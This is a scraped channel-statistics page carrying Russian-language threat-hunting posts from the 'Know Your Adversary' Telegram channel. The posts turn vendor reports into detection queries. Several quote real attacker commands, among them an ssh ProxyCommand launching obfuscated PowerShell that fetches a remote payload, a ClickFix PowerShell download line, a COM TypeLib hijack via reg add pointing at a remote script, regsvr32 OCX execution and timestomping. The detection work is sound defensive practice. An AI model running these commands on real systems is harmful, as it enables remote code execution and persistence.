Мир сегодня с "Юрий Подоляка"

Труха⚡️Україна

查看

Николаевский Ванёк

查看

Мир сегодня с "Юрий Подоляка"

查看

Труха⚡️Україна

查看

Николаевский Ванёк

查看

Know Your Adversary

https://www.knowyouradversary.ru/

TGlist 评分

类型公开

验证

未验证

可信度

不可靠

位置

语言其他

频道创建日期Січ 01, 2025

添加到 TGlist 的日期

Квіт 02, 2025

我是频道所有者

变更历史

关联群组

Know Your Adversary Chat

Telegram频道 Know Your Adversary 统计数据

详细信息

订阅者

416

24 小时

20.4%一周

61.5%一个月

4712.7%

引用指数

0

提及0频道上的转发0频道上的提及0

每帖平均覆盖率

88

12 小时88

83.3%24 小时88

83.3%48 小时48

47.3%

参与率 (ER)

2.08%

转发2评论0反应1

覆盖率参与率 (ERR)

11.59%

24 小时0%一周

2.53%一个月

3.11%

每则广告帖子的平均覆盖率

48

1 小时48100%1 – 4 小时00%4 - 24 小时00%

详细信息

将我们的机器人连接到频道以了解该频道的受众性别。

过去 24 小时内的帖子数

1

动态

"Know Your Adversary" 群组最新帖子

所有帖子

07.05.202515:38

Всем привет!

Продолжаем рассматривать RMM-инструменты, которые наблюдаются в арсенале группировок, распространяющих вымогательское ПО. На этот раз мы посмотрим на Supremo. Это легитимное средство удалённого доступа, которое было замечено в использовании аффилированными с Black Basta злоумышленниками.

Обычно злоумышленники не модифицируют исполняемый файл, поэтому он выглядит абсолютно легитимным. Это значит, что мы снова и снова можем сосредоточиться на метаданных. Вот пример запроса:

event_type: "processcreatewin"

AND

proc_file_productname: "Supremo Remote Control"

То же самое касается событий создания файлов в папках, связанных с инструментом:

event_type: "filecreate"

AND

file_path: "SupremoRemoteDesktop"

Какие ещё интересные RMM-инструменты, используемые операторами вымогателей, вам доводилось видеть?

Увидимся завтра!

English version

无法访问
媒体内容

06.05.202514:32

Всем привет!

Очередной день — очередной способ обхода EDR. В недавнем отчёте команда реагирования на инциденты Stroz Friedberg компании Aon выявила технику Bring Your Own Installer, которую злоумышленник использовал для обхода и отключения SentinelOne EDR.

Злоумышленник воспользовался легитимным установщиком SentinelOne EDR для запуска процесса обновления агента, но прервал его, завершив процесс msiexec.exe, связанный с обновлением версии SentinelOne.

Если такая возможность ещё есть, можно попытаться отследить подозрительные события завершения процесса msiexec.exe, например, с помощью taskkill:

event_type: "processcreatewin"

AND

proc_file_name: "taskkill"

AND

cmdline: "msiexec"

Увидимся завтра!

English version

05.05.202517:00

Всем привет!

Вчера мы говорили о некоторых новых инструментах, разработанных злоумышленником, известным как Venom Spider. Но давайте немного поговорим о классических инструментах, с которыми он также ассоциируется. Я имею в виду бэкдор more_eggs. Он всё ещё используется — например, вот свежая кампания, о которой пишет Arctic Wolf.

Хочу обратить внимание на следующий поведенческий маркер — msxsl.exe, легитимный бинарный файл, известный как Microsoft Command Line Transformation Utility, используется для запуска бэкдора:

msxsl.exe D30F38D93CA9185.txt D30F38D93CA9185.txt

Мы можем использовать этот маркер для построения поискового запроса:

event_type: "processcreatewin"

AND

proc_file_name: "msxsl.exe"

AND

cmdline: "txt"

А вы замечали использование msxsl.exe в своей инфраструктуре?

Увидимся завтра!

04.05.202511:29

Всем привет!

Продолжаю пополнять свою коллекцию PowerShell! Сегодня утром я читал вот этот отчет и заметил ещё один реальный пример злоупотребления PowerShell для подмены временных меток (timestomping).

Злоумышленник создавал запланированные задачи для запуска MeshAgent, а затем выполнял команды PowerShell для изменения временных меток связанных файлов. Вот примеры:

(Get-Item “.\vcruntime140_1.dll”).LastAccessTime=(“12 May 2024 11:14:00”) `

Например, мы можем использовать события ScriptBlock для охоты на злоупотребление командлетом Get-Item:

event_type: "ScriptExecutionWin"

AND

script_text: "get-item" AND ("lastaccesstime" OR "lastwritetime" OR "creationtime")

Удачной охоты!

Увидимся завтра!

English version

03.05.202512:39

Всем привет!

Insikt Group раскрыла два новых семейства вредоносных программ: TerraStealerV2 и TerraLogger. Оба были приписаны злоумышленнику, известному как Golden Chickens. Этот злоумышленник предоставляет инструменты другим преступникам, работая по модели Malware-as-a-Service (MaaS).

Я ознакомился с отчетом и (как всегда) нашел несколько возможностей для обнаружения.

Например, злоумышленник использовал ssh.exe для проксирования выполнения PowerShell:

ssh.exe -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"

Мы можем искать подобную активность с помощью следующего запроса:

event_type: "processcreatewin"

AND

proc_file_name: "ssh.exe"

AND

cmdline: "proxycommand"

Еще один пример, злоумышленник использует regsvr32.exe для выполнения вредоносного OCX-файла:

regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx

Мы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок Temp:

event_type: "processcreatewin"

AND

proc_file_name: "regsvr32.exe"

AND

cmdline: "temp" AND "ocx"

Еще пример: стилер использует ifconfig[.]me для сбора информации о IP-адресе скомпрометированной системы, мы также можем использовать это для проактивного поиска:

event_type: "dnsreq"

AND

dns_rname: "ifconfig.me"

Обязательно ознакомьтесь с отчетом — в нем полно идей для разработки детектирующей логики!

Увидимся завтра!

English version

02.05.202508:14

Всем привет!

Мы уже несколько раз говорили о том, как злоумышленники используют PowerPoint для доставки вредоносного ПО. Пора обсудить это снова!

Seqrite опубликовала отчет о деятельности APT36 (мы отслеживаем этот кластер под названием Translucent Werewolf). Согласно исследованию, злоумышленники использовали файлы надстроек PowerPoint (PPAM) для доставки Crimson RAT.

По моим наблюдениям, такие файлы довольно редки в современных инфраструктурах, поэтому мы можем искать события открытия PPAM-файлов:

event_type: "processcreatewin"

AND

proc_file_name: "powerpnt.exe"

AND

cmdline: "ppam"

Увидимся завтра!

English version

01.05.202512:40

Всем привет!

Читая отчет Trend Micro об Earth Kasha, я заметил любопытный поведенческий маркер ROAMINGMOUSE: он использует WMI для запуска JSLNTOOL.EXE через explorer.exe. JSLNTOOL.EXE — это легитимное приложение, которое злоумышленник использует для сайдлоадинга JSFC.dll — вредоносного загрузчика.

Это означает, что мы можем искать подозрительные запуски explorer.exe через wmiprvse.exe с помощью следующего запроса:

event_type: "processcreatewin"

AND

proc_file_path: "explorer.exe"

AND

proc_p_file_path: "wmiprvse.exe"

Что касается JSLNTOOL.EXE, можно также искать связанные события запуска, обращая внимание на нетипичные расположения:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "jslntool.exe"

AND NOT

proc_file_path: "justsystems"

Увидимся завтра!

English version

30.04.202515:40

Всем привет!

Мы всё чаще видим использование инструментов для туннелирования. Настолько часто, что такие утилиты, как ngrok и chisel, сегодня зачастую мгновенно обнаруживаются и блокируются (правда ведь?). Что это значит? Злоумышленники всегда ищут альтернативы!

И одной из таких альтернатив является iox — это инструмент с открытым исходным кодом для проброса портов и проксирования внутри сети. Например, его использовала группа, стоящая за вымогателем Ghost.

Этот инструмент часто применяется для проброса портов RDP и SSH, это мы и можем использовать для поиска:

event_type: "processcreate"

AND

cmdline: "fwd" AND ("22" OR "3389")

Больше информации об инструменте можно найти здесь.

Увидимся завтра!

28.04.202518:36

Всем привет!

Пора снова поговорить о средствах уклонения от защиты, замеченных в атаках программ-вымогателей! На этот раз мы рассмотрим инструментарий группировки Qilin.

Инструмент, на который мы обратим внимание, называется YDArk. Это мощный инструмент для манипуляций с ядром системы, который появился на китайских теневых форумах ещё в 2020 году. Разумеется, злоумышленники используют его для завершения процессов, связанных с антивирусами и решениями EDR.

Как обычно, мы можем использовать оригинальное имя файла для обнаружения:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "YDArk.exe"

Также можно сфокусироваться на драйвере, который он использует:

event_type: "driverloadwin"

AND

file_name: "YDArkDrv.sys"

Кроме того, он создаёт службу — это ещё одна возможность для обнаружения!

Увидимся завтра!

English version

23.04.202515:46

Всем привет!

Злоумышленники продолжают использовать легитимные исполняемые файлы для DLL Side-Loading. На этот раз они злоупотребили программами от Trend Micro и Bitdefender.

Согласно отчёту компании Symantec, шпионская группа Billbug использовала исполняемый файл от Trend Micro с именем tmdbglog.exe для сайдлоадинга вредоносной библиотеки tmdglog.dll, а также файл bds.exe от Bitdefender для сайдлоадинга DLL с именем log.dll.

Мы можем охотиться за подозрительной активностью этих исполняемых файлов, ориентируясь на подозрительные имена и расположения:

event_type: "processcreatewin"

AND

proc_file_originalfilename: ("PtWatchDog.exe" OR "BDSubWiz.exe")

Увидимся завтра!

22.04.202515:02

Всем привет!

Мы уже несколько раз говорили о ClickFix. Но интересно наблюдать, как по-разному используется эта техника.

Согласно отчёту Proofpoint, несколько прогосударственных групп начали применять эту технику. Например, TA427 (мы отслеживаем этот кластер активности под именем Monolithic Werewolf). Злоумышленник маскировал вредоносную PowerShell-команду под регистрационный код:

powershell -windowstyle hidden -Command iwr

Как видно, команда включает в себя типичные для вредоносных скриптов командлеты PowerShell, такие как iwr и iex. Разумеется, мы можем использовать это для проактивного поиска (или даже детектирования!):

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("iwr" AND "iex")

А вы наблюдали другие интересные способы применения ClickFix?

Увидимся завтра!

English version

21.04.202507:02

Всем привет!

Давайте поговорим о не самых распространённых методах закрепления. Согласно отчёту компании ReliaQuest, Black Basta начали использовать новый метод закрепления, основанный на перехвате Component Object Model Type Library.

При перехвате TypeLib злоумышленники изменяют записи в реестре, чтобы перенаправить легитимные COM-объекты на вредоносные скрипты или файлы.

Злоумышленники выполнили следующую команду:

reg add "HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /f

Например, мы можем искать злоупотребление reg.exe с помощью запроса:

event_type: "processcreatewin"

AND

proc_file_name: "reg.exe"

AND

cmdline: ("TypeLib" И "script")

Также можно отслеживать события изменения реестра:

event_type: "registryvaluesetwin"

AND

reg_key_path: "TypeLib"

AND

reg_value_data: "script"

Увидимся завтра!

English version

20.04.202519:15

Всем привет!

Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.

Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.

Злоумышленники используют вредоносные файлы с расширением .library-ms, которые распространяются через фишинговые письма. Файлы с таким расширением встречаются довольно редко, поэтому мы можем отследить их появление по событиям создания файлов:

event_type: "filecreate"

AND

file_path: "library-ms"

Увидимся завтра!

English version

19.04.202515:17

Всем привет!

Давайте рассмотрим ещё один инструмент, который используют вымогатели для отключения решений AV/EDR. Я говорю о ZammOcide.

Это ещё один пример эксплуатации уязвимого драйвера, на этот раз драйвера Zemana Anti-Malware (zam64.sys). Разумеется, мы можем использовать это для обнаружения:

event_type: "driverloadwin"

AND

file_name: "zam64.sys"

Инструмент также создает сервис с именем "ZammOcide". Это мы тоже можем использовать для обнаружения:

event_type: "serviceinstallwin"

AND

service_name: "ZammOcide"

Конечно, этот инструмент используется в реальных атаках! Например, группой вымогателей CrazyHunter.

Увидимся завтра!

English version

18.04.202508:54

Всем привет!

Сегодня мы поговорим о ещё одном интересном сервисе, который злоумышленники используют для связи с серверами управления и контроля (C&C).

Согласно этому отчёту команды Kaspersky, IronHusky использовал легитимный сервер https://ppng[.]io, основанный на проекте piping-server, для запроса команд и отправки результатов их выполнения.

Что это означает? Мы можем отслеживать обращения к этому домену с помощью следующего запроса:

event_type: "dnsreq"

AND

dns_rname: "ppng.io"

Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.

Увидимся завтра!

所有帖子

未找到任何内容 😢

详细信息

记录

07.05.202523:59

416订阅者

11.01.202523:59

0引用指数

22.01.202523:59

445每帖平均覆盖率

22.01.202523:59

445广告帖子的平均覆盖率

08.02.202523:59

7.07%ER

10.04.202517:52

27.63%ERR

发展

详细信息

订阅者

引用指数

每篇帖子的浏览量

每个广告帖子的浏览量

ERR

详细信息

Know Your Adversary 热门帖子

所有帖子

30.04.202515:40

event_type: "processcreate"

AND

cmdline: "fwd" AND ("22" OR "3389")

Больше информации об инструменте можно найти здесь.

Увидимся завтра!

04.05.202511:29

(Get-Item “.\vcruntime140_1.dll”).LastAccessTime=(“12 May 2024 11:14:00”) `

Например, мы можем использовать события ScriptBlock для охоты на злоупотребление командлетом Get-Item:

event_type: "ScriptExecutionWin"

AND

script_text: "get-item" AND ("lastaccesstime" OR "lastwritetime" OR "creationtime")

Удачной охоты!

Увидимся завтра!

English version

01.05.202512:40

event_type: "processcreatewin"

AND

proc_file_path: "explorer.exe"

AND

proc_p_file_path: "wmiprvse.exe"

event_type: "processcreatewin"

AND

proc_file_originalfilename: "jslntool.exe"

AND NOT

proc_file_path: "justsystems"

Увидимся завтра!

English version

03.05.202512:39

ssh.exe -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"

Мы можем искать подобную активность с помощью следующего запроса:

event_type: "processcreatewin"

AND

proc_file_name: "ssh.exe"

AND

cmdline: "proxycommand"

Еще один пример, злоумышленник использует regsvr32.exe для выполнения вредоносного OCX-файла:

regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx

Мы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок Temp:

event_type: "processcreatewin"

AND

proc_file_name: "regsvr32.exe"

AND

cmdline: "temp" AND "ocx"

event_type: "dnsreq"

AND

dns_rname: "ifconfig.me"

06.05.202514:32

event_type: "processcreatewin"

AND

proc_file_name: "taskkill"

AND

cmdline: "msiexec"

Увидимся завтра!

English version

02.05.202508:14

event_type: "processcreatewin"

AND

proc_file_name: "powerpnt.exe"

AND

cmdline: "ppam"

Увидимся завтра!

English version

20.04.202519:15

event_type: "filecreate"

AND

file_path: "library-ms"

Увидимся завтра!

English version

19.04.202515:17

event_type: "driverloadwin"

AND

file_name: "zam64.sys"

Инструмент также создает сервис с именем "ZammOcide". Это мы тоже можем использовать для обнаружения:

event_type: "serviceinstallwin"

AND

service_name: "ZammOcide"

28.04.202518:36

event_type: "processcreatewin"

AND

proc_file_originalfilename: "YDArk.exe"

Также можно сфокусироваться на драйвере, который он использует:

event_type: "driverloadwin"

AND

file_name: "YDArkDrv.sys"

Кроме того, он создаёт службу — это ещё одна возможность для обнаружения!

Увидимся завтра!

English version

09.04.202518:49

Всем привет!

Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.

Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл: C:\ProgramData\SkyPDF\PDUDrv.blf.

Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:

event_type: "filecreatewin"

AND

file_path: ("programdata" AND "blf")

Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.

Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!

Увидимся завтра!

English version

无法访问
媒体内容

07.05.202515:38

event_type: "processcreatewin"

AND

proc_file_productname: "Supremo Remote Control"

То же самое касается событий создания файлов в папках, связанных с инструментом:

event_type: "filecreate"

AND

file_path: "SupremoRemoteDesktop"

23.04.202515:46

event_type: "processcreatewin"

AND

proc_file_originalfilename: ("PtWatchDog.exe" OR "BDSubWiz.exe")

Увидимся завтра!

18.04.202508:54

event_type: "dnsreq"

AND

dns_rname: "ppng.io"

Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.

Увидимся завтра!

22.04.202515:02

powershell -windowstyle hidden -Command iwr

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("iwr" AND "iex")

А вы наблюдали другие интересные способы применения ClickFix?

Увидимся завтра!

English version

21.04.202507:02

reg add "HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /f

Например, мы можем искать злоупотребление reg.exe с помощью запроса:

event_type: "processcreatewin"

AND

proc_file_name: "reg.exe"

AND

cmdline: ("TypeLib" И "script")

Также можно отслеживать события изменения реестра:

event_type: "registryvaluesetwin"

AND

reg_key_path: "TypeLib"

AND

reg_value_data: "script"

Увидимся завтра!

English version

登录以解锁更多功能。